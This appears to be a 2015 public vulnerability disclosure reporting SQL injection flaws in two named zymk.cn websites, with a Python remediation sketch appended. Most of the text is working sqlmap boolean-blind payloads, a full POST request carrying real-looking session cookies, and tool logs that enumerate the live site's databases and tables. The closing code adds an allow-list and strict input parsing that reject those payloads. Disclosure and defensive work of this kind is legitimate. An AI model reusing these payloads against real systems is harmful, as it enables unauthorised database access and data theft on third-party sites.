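2015-11-02: Details reported to the vendor; awaiting vendor response.
2015-11-07: The vendor chose to ignore the vulnerability; details disclosed to the public.

漫客网 SQL injection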
http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
[13:31:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:31:54] [INFO] fetching database names
[13:31:54] [INFO] fetching number of databases
[13:31:54] [INFO] resumed: 2
[13:31:54] [INFO] resumed: information_schema
[13:31:54] [INFO] resumed: mkshop
available databases [2]:
[*] information_schema
[*] mkshop

http://baike.zymk.cn/index.php?search-fulltext-title-1--all-0-within-time-desc-1

POST /index.php?search-default HTTP/1.1
Host: baike.zymk.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://baike.zymk.cn/index.php?doc-create.html
Cookie: BAIDU_DUP_lcr=http://www.baidu.com/link?url=Zjo417Xo1rTTvkH3nz19eSONwF-7YiqRO6ytC3XN6Ma&wd=&eqid=81757fa0000926ad00000005563444e9; Hm_lvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446266096; Hm_lpvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446269195; FX7m_3f67_saltkey=w4hcq4U3; FX7m_3f67_lastvisit=1446263008; FX7m_3f67_sid=y769HA; FX7m_3f67_lastact=1446268181%09misc.php%09seccode; FX7m_3f67_st_p=0%7C1446268175%7C4040132a2da2b28facae50f5f3ec46ac; FX7m_3f67_visitedfid=47D299D5472; FX7m_3f67_viewid=tid_596946; FX7m_3f67_seccode=6324.ec5df85813cf7859f6; TP_think_language=%22zh-CN%22; hd_sid=NkVt0X; hd_searchtime=1446267013; CNZZDATA1789733=cnzz_eid%3D1206615900-1446266704-%26ntime%3D1446266704; FX7m_3f67_home_readfeed=1446268160; FX7m_3f67_nofocus_home=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

searchtext=1&full=1

The injectable parameter is full.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: full (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: searchtext=1&full=1 AND 2105=2105
---
[13:35:35] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2008
[13:35:35] [INFO] fetching database names
[13:35:35] [INFO] fetching number of databases
[13:35:35] [INFO] resumed: 4411
[13:35:35] [INFO] resuming partial value: #\x13\x12\x12\n\tEE%##\x13\x12\x12\n\n\n\nER\tIEE%###\x13\x12\x12\n\n\tIF\tEE%%E%%%#\x13\x13\x12\x12\x12\x12\n\tIEEE%%#%%#####%%#%#####\x13\x13\x12\x13\x13\x13\x13\x12\x12\x12\x12\x12\n\x12\x12\x12\x13%##%EE%&\n\nIEE%##\x13\x13\x12\x13\x12\n\tIEE%##\x14\x13\x12\x12\n\tIEE%%##\x13\x13\x12\x12\n\n\tIIEE%##\x13\x12\x12\n\tE%%####\x13\x12\n\tIIEEE%#\x13\x12\x12\n\tEEE%##\x12\x12\x13\x13%IIEEEEE%%IM%E%#%#\x13\x13\x12\x12\x12\n\n\tIIK\x13\x12\x12\x12###\x13\x13#\x13\x13\x13\x12\x12\x12\tJ\tJ\x13*\n\n\tIIEEEIIEE%#\x13\x12\x12\n\tIIIE%E%#c#\x13E%##\x13\x12\x12\x12\n\n\tIE%%%%###\x13\x12\x12\x12\n\n\tIEE##\x13\x13\x13\x13\x12\x12\x12\n\tIEE%#%"\x13\x13\x12\n\tR\tEE#
[13:35:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:35:35] [INFO] retrieved:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
[13:36:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:36:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:36:16] [INFO] fetching tables for database: 'mkshop'
[13:36:16] [INFO] fetching number of tables for database 'mkshop'
[13:36:16] [INFO] resumed: 189
[13:36:16] [INFO] resuming partial value: activi
[13:36:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:36:16] [INFO] retrieved: ty_nu

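Extraction runs slowly, so I did not go any deeper.

Severity: no impact (ignored by vendor)
Ignored at: 2015-11-07 15:16
Vulnerability rank: 4 (WooYun rating)
None yet.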
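
Both injection points in this report take a value that belongs to a small fixed set: a sort column for `order` and a numeric flag for `full`. The Python sketch below is an added example, not code from the report or from the vendor. It assumes a hypothetical `tag` table and sort keys, resolves the sort key through an allow-list, parses numeric input strictly, and uses the two sqlmap payloads shown above as inputs that must be rejected.

```python
import re
import sqlite3

# Assumption: public sort keys mapped to real columns. Only "listorder" is on
# the page; "id" and "name" are hypothetical.
SORT_COLUMNS = {"listorder": "listorder", "id": "id", "name": "name"}
UINT = re.compile(r"[0-9]{1,9}")
# The two payloads sqlmap reports on the page, used here as rejected inputs.
PAGE_ORDER_PAYLOAD = ("(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*"
                      "(SELECT 1825 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))")
PAGE_FULL_PAYLOAD = "1 AND 2105=2105"


def parse_uint(value):
    """Accept only a short run of ASCII digits (e.g. the `full` flag or `id`)."""
    if not isinstance(value, str) or not UINT.fullmatch(value):
        raise ValueError("expected an unsigned integer")
    return int(value)


def build_tag_query(params):
    """Build (sql, bind_values) for a hypothetical tag listing."""
    # Identifiers cannot be bound as parameters, so the sort key is resolved
    # through the allow-list; the request value never reaches the SQL text.
    column = SORT_COLUMNS.get(params.get("order", "listorder"))
    if column is None:
        raise ValueError("unsupported sort key")
    sql = f"SELECT id, name FROM tag WHERE category_id = ? ORDER BY {column}"
    return sql, (parse_uint(params.get("id", "")),)


def demo():
    """Run the builder on constructed rows, then feed it the page's payloads."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tag (id, category_id, name, listorder)")
    db.executemany("INSERT INTO tag VALUES (?, ?, ?, ?)",
                   [(1, 2, "b", 20), (2, 2, "a", 10), (3, 9, "c", 5)])
    rows = db.execute(*build_tag_query({"id": "2", "order": "listorder"})).fetchall()
    rejected = []
    for attempt in (lambda: build_tag_query({"id": "2", "order": PAGE_ORDER_PAYLOAD}),
                    lambda: parse_uint(PAGE_FULL_PAYLOAD)):
        try:
            attempt()
        except ValueError as exc:
            rejected.append(str(exc))
    return rows, rejected


if __name__ == "__main__":
    print(demo())
```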